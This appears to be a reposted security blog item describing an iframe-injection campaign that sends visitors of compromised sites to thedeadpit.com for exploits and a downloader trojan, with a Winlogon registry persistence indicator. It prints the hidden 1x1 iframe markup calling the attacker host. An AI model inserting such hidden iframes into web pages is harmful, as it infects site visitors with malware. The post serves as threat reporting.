TheDeadPit.com Tortures Web Surfers

Over the past several weeks, a multitude of sites have been injected with malicious iframes that point to exploit code (which leads to downloader trojans) located on the attacker-owned ‘thedeadpit.com’. The form is always the same:

iframe src=\”http://thedeadpit.com/?click=RANDOM\” width=1 height=1 style=\”visibility:hidden;position:absolute\

where random is a numeric identifier that differs with each site compromised.

The most recently discovered victim of thedeadpit.com iframe injection is the website of the Bangladesh Directorate of Primary Education, http://www.dpe.gov.bd. The Nigerian Tribune (www.tribune.com.ng) is also among those sites compromised in thedeadpit.com injection attacks.

The attack site delivers the malware intermittently, remaining dormant in between attacks. The trojan downloader delivered via the attacks modifies the Winlogon Shell = Explorer value as follows:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
Value: Shell = Explorer.exe <path to downloader>

By default, the value should read simply “Shell = Explorer.exe” with no additional file specificed.

As it’s name suggests, a downloader trojan downloads additional malware to the infected computer. Most of today’s malware consists of remotely configurable data theft trojans. Heartland Payment Systems is the poster child for what today’s malware is capable of doing.

Alexbtp – Anderson_neo – Tong hop tu internet

  1. Chưa có phản hồi.
  1. No trackbacks yet.

Gửi phản hồi

Mời bạn điền thông tin vào ô dưới đây hoặc kích vào một biểu tượng để đăng nhập:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Log Out / Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Log Out / Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Log Out / Thay đổi )

Google+ photo

Bạn đang bình luận bằng tài khoản Google+ Log Out / Thay đổi )

Connecting to %s

%d bloggers like this: